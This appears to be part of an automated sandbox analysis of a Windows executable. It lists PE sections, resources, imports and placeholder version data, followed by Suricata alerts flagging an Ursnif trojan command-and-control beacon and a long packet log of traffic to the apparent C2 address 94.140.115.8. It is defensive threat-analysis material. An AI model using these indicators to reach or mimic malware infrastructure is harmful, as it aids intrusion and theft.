.text | 0x1000 | 0x3efe0 | 0x3f000 | False | 0.375902932788 | data | 4.4597296346 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ |
.rdata | 0x40000 | 0x3fb5f | 0x40000 | False | 0.815296173096 | data | 7.22909930069 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.data | 0x80000 | 0x9537 | 0x7000 | False | 0.327043805804 | data | 5.46899156125 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
.idata | 0x8a000 | 0x98d | 0x1000 | False | 0.2060546875 | data | 2.48883672307 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
.rsrc | 0x8b000 | 0xc100 | 0xd000 | False | 0.465106670673 | data | 5.38059585556 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.reloc | 0x98000 | 0x17d7 | 0x2000 | False | 0.237915039062 | data | 3.90488138375 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
Name | RVA | Size | Type | Language | Country |
---|---|---|---|---|---|
RT_BITMAP | 0x8b510 | 0x666 | data | English | United States |
RT_ICON | 0x8bb78 | 0x485d | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States |
RT_ICON | 0x903d8 | 0x25a8 | dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 331218944, next used block 4106092544 | English | United States |
RT_ICON | 0x92980 | 0xea8 | data | English | United States |
RT_ICON | 0x93828 | 0x8a8 | dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0 | English | United States |
RT_ICON | 0x940d0 | 0x568 | GLS_BINARY_LSB_FIRST | English | United States |
RT_DIALOG | 0x94638 | 0xb4 | data | English | United States |
RT_DIALOG | 0x946f0 | 0x120 | data | English | United States |
RT_DIALOG | 0x94810 | 0x158 | data | English | United States |
RT_DIALOG | 0x94968 | 0x202 | data | English | United States |
RT_DIALOG | 0x94b70 | 0xf8 | data | English | United States |
RT_DIALOG | 0x94c68 | 0xa0 | data | English | United States |
RT_DIALOG | 0x94d08 | 0xee | data | English | United States |
RT_GROUP_ICON | 0x94df8 | 0x4c | data | English | United States |
RT_VERSION | 0x94e48 | 0x290 | MS Windows COFF PA-RISC object file | English | United States |
DLL | Import |
---|---|
msvcrt.dll | fgetwc, strcoll, srand |
GDI32.dll | GetBkColor, ExtSelectClipRgn, GetTextMetricsW, GetCharWidthFloatA, GetCharWidth32A, GetTextCharacterExtra, GetCharWidthA, GdiComment |
KERNEL32.dll | GetStringTypeA, WriteProcessMemory, GetCommTimeouts, GetConsoleCP, EnumResourceTypesA, GlobalFlags, GetFileTime, GetThreadLocale, LocalHandle, GetLargestConsoleWindowSize, EraseTape, GetDiskFreeSpaceExA, lstrlenA, GlobalMemoryStatus, GetModuleFileNameA, GetBinaryTypeA, DebugBreak |
ADVAPI32.dll | RegGetValueA, GetFileSecurityA, EnumServicesStatusExW, InitiateSystemShutdownExW |
mscms.dll | GetColorDirectoryW |
USER32.dll | GetClientRect, GetClassNameA, GetPropW, GetScrollBarInfo, DeleteMenu, MessageBoxIndirectW, GetMenuItemRect, GetMessagePos, DefMDIChildProcW, GetUpdateRgn, LoadMenuA, GetQueueStatus, GetMessageW |
OLEAUT32.dll | LoadTypeLibEx, GetRecordInfoFromTypeInfo |
Description | Data |
---|---|
LegalCopyright | A Company. All rights reserved. |
InternalName | |
FileVersion | 1.0.0.0 |
CompanyName | A Company |
ProductName | |
ProductVersion | 1.0.0.0 |
FileDescription | |
OriginalFilename | myfile.exe |
Translation | 0x0409 0x04b0 |
Language of compilation system | Country where language is spoken | Map |
---|---|---|
English | United States |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
04/28/22-15:36:09.408600 04/28/22-15:36:09.408600 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
04/28/22-15:36:11.602821 04/28/22-15:36:11.602821 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
04/28/22-15:35:48.541659 04/28/22-15:35:48.541659 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49760 | 80 | 192.168.2.4 | 13.107.42.16 |
04/28/22-15:36:10.453628 04/28/22-15:36:10.453628 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 28, 2022 15:36:09.334805965 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:09.404352903 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:09.404525042 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:09.408600092 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:09.476322889 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:09.817040920 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:09.817101002 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:09.817142963 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:09.817173004 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:09.817179918 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:09.817205906 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:09.817212105 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:09.817220926 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:09.817226887 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:09.817260027 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:09.817271948 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:09.817291021 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:09.817313910 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:09.817332983 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:09.817351103 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:09.817372084 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:09.817380905 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:09.817414045 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:09.817420959 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:09.817460060 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:09.873228073 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:09.873258114 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:09.873275995 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:09.873294115 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:09.873311996 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:09.873331070 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:09.873332024 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:09.873356104 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:09.873379946 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:09.873411894 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:09.873430967 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:09.873464108 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:09.873466015 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:09.873481989 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:09.873491049 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:09.873509884 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:09.873524904 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:09.873534918 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:09.873570919 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:09.873580933 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:09.873594999 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:09.873624086 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:09.873646021 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:09.894737959 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:09.894778967 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:09.894797087 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:09.894814014 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:09.894830942 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:09.894849062 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:09.894859076 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:09.894905090 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:09.895411968 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:09.895463943 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:09.927962065 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:09.927989960 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:09.928059101 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:09.928086042 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:09.928761959 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:09.928822041 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:09.939477921 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:09.939510107 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:09.939528942 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:09.939579964 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:09.939603090 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:09.939620972 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:09.939632893 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:09.939639091 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:09.939662933 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:09.939768076 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:09.940469980 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:09.940490961 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:09.940509081 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:09.940529108 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:09.940552950 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:09.942028999 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:09.942049980 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:09.942075968 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:09.942090988 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:09.942120075 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.002970934 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.003031969 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.003077984 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.003129005 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.003175974 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.003182888 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.003298044 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.003357887 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.003359079 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.003412962 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.003421068 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.003464937 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.005657911 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.005700111 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.005727053 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.005738020 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.005753040 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.005778074 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.005810976 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.005820036 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.005836964 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.005872011 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.005891085 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.006009102 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.006057024 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.006442070 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.072573900 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.072664976 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.072706938 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.072712898 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.072742939 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.072746038 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.072782993 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.072783947 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.072798014 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.072824955 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.072838068 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.072877884 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.074043989 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.074086905 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.074115038 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.074127913 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.074135065 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.074177980 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.075705051 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.075747967 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.075783968 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.075786114 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.075798988 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.075836897 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.085758924 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.085818052 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.085850000 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.085859060 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.085875988 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.085911036 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.091355085 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.091439962 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.151554108 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.151611090 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.151653051 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.151721954 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.151768923 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.152261019 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.152303934 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.152374029 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.152378082 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.152430058 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.153134108 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.153177023 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.153218985 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.153229952 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.153278112 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.164346933 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.164397001 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.164436102 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.164448977 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.164475918 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.164499044 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.188319921 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.190128088 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.227303982 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.227360010 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.227400064 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.227443933 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.227488041 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.227504969 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.227528095 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.227538109 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.227597952 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.227605104 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.227962971 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.228004932 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.228053093 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.228099108 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.228127003 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.228595972 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.228636980 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.228676081 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.228722095 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.228753090 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.234241962 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.234287977 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.234321117 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.234328985 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.234349012 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.234388113 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.269913912 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.270721912 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.289035082 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.289093971 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.289135933 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.289210081 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.289259911 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.290395021 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.290435076 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.290476084 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.290520906 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.290549994 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.290592909 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.290637016 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.290674925 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.290700912 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.290716887 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.290734053 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.290760040 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.290774107 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.290798903 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.290815115 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.290858030 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.346803904 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.346863985 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.346905947 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.346968889 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.347016096 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.348486900 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.349179029 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.355747938 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.355791092 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.355824947 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.355874062 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.355901957 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.358489037 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.358530045 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.358566999 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:10.358623028 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:10.358652115 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
